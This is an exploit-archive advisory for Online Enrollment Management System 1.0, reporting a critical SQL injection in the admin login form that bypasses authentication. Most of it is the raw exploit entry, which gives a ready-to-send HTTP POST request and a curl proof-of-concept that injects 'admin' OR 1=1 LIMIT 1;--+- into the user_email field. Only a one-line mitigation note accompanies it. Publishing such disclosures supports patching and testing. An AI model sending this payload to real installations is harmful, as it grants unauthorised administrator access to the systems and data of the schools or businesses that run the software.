Online Enrollment Management System 1.0 - Authentication Bypass

vendor:

Online Enrollment Management System

by:

Amine Ismail

9.8

CVSS

CRITICAL

Authentication Bypass

CWE

Product Name: Online Enrollment Management System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:sourcecodester:online_enrollment_management_system:1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 10, Kali Linux

2021

Online Enrollment Management System 1.0 – Authentication Bypass

Admin panel authentication can be bypassed due to a SQL injection in the login form. A curl request can be used to exploit the vulnerability, with the user_email parameter set to 'admin' OR 1=1 LIMIT 1;--+- and the user_pass parameter set to 'junk'.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Online Enrollment Management System 1.0 - Authentication Bypass
# Date: 07.10.2021
# Exploit Author: Amine ismail @aminei_
# Vendor Homepage: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html
# Software Link: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html
# Version: 1.0
# Tested on: Windows 10, Kali Linux
# Admin panel authentication bypass

Admin panel authentication can be bypassed due to a SQL injection in the login form:

Request:
  POST /OnlineEnrolmentSystem/admin/login.php HTTP/1.1
  Host: 127.0.0.1
  Content-Length: 63
  Cookie: PHPSESSID=jd2phsg2f7pvv2kfq3lgfkc98q

  user_email=admin'+OR+1=1+LIMIT+1;--+-&user_pass=admin&btnLogin=

PoC:
  curl -d "user_email=admin' OR 1=1 LIMIT 1;--+-&user_pass=junk&btnLogin=" -X POST http://127.0.0.1/OnlineEnrolmentSystem/admin/login.php